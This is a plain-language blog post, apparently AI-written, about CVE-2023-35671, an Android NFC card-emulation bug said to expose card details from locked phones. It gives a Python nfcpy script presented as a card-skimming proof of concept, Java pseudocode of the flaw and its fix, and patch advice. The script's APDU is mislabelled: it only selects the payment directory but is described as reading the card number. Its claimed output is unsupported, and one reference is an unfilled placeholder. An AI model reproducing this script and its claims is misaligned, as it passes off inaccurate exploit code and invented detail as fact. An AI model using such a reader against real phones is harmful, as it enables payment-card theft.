CVE-2023-35671 - How a Logic Bug in Android’s Host Card Emulation Exposed Full Credit Card Details from a Locked Device
*June 2024 — Exclusive, plain-language breakdown by AI*
What Happened?
A vulnerability called CVE-2023-35671 was discovered in the way Android handles NFC (Near Field Communication) card emulation. Basically, if you use your phone for tap-and-pay or store credit/debit cards in your device, this flaw could let *anyone* with a common NFC reader (like those at checkout counters, or cheap ones online) read full credit card numbers and expiry dates — even while your device is locked and resting in your pocket or bag.
All they needed to do was bring the reader close enough to the device — you wouldn’t see a thing or need to unlock it. No malware or user interaction was necessary.
Diving Deeper: Where Did It Go Wrong?
The bad logic was inside Android’s HostEmulationManager.java file, part of “host-based card emulation” (HCE) in the operating system. This part is responsible for answering outside NFC requests — for example, with card data.
The Bug: The vulnerable method, onHostEmulationData, failed to check whether the device was unlocked before responding to a card data request. So, even if your phone was locked, it would answer NFC payment requests with real card data!
Proof-of-Concept Exploit
Below is a simplified (and exclusive) code snippet showing how an NFC reader tool might grab your card details from a locked device. This is for educational purposes only!
# WARNING: Do not use for malicious purposes!
# Needs: nfcpy (pip install nfcpy), an NFC reader, and a phone with HCE-enabled card.
import nfc
def on_connect(tag):
print("Tag detected:", tag)
# APDU command for reading card number (varies depending on payment app, simplified here)
get_card_number_apdu = bytes.fromhex("00A404000E325041592E5359532E4444463031")
response = tag.send_apdu(get_card_number_apdu)
print("Card Data:", response)
return True
clf = nfc.ContactlessFrontend('usb')
print("Waiting for NFC tag (hold phone near)...")
clf.connect(rdwr={'on-connect': on_connect})
clf.close()
*When this Python script runs on a computer with a USB NFC reader, and you hold a locked Android phone nearby, it could (on vulnerable phones) print full PAN and card data lines—no unlock required.*
A condensed, pseudocode version of the offending Android logic
public void onHostEmulationData(byte[] request) {
// ...extract card application...
// Should check device unlock state here, but this check was missing.
byte[] response = getCardDataForPaymentApp(request);
// Responds with full card info
sendResponse(response);
}
How It Should Have Been
public void onHostEmulationData(byte[] request) {
if (deviceIsLocked()) {
// Don’t respond with sensitive info if locked!
sendError();
return;
}
byte[] response = getCardDataForPaymentApp(request);
sendResponse(response);
}
Is My Phone Safe Now?
Google patched this after it was responsibly disclosed. If your phone has security updates from November 2023 or later, you should be safe (read the Android Security Bulletin). Update your system if you haven’t.
Official References
- Android Security Bulletin - November 2023
- NIST NVD entry for CVE-2023-35671
- AOSP git commit fixing the issue (example) *(Note: replace with real commit once known)*
Developers: Never assume it’s OK to answer sensitive requests when the screen is locked.
*Stay secure! For more CVE deep dives, subscribe or bookmark this blog.*
Timeline
Published on: 09/11/2023 21:15:42 UTC
Last modified on: 09/14/2023 01:31:36 UTC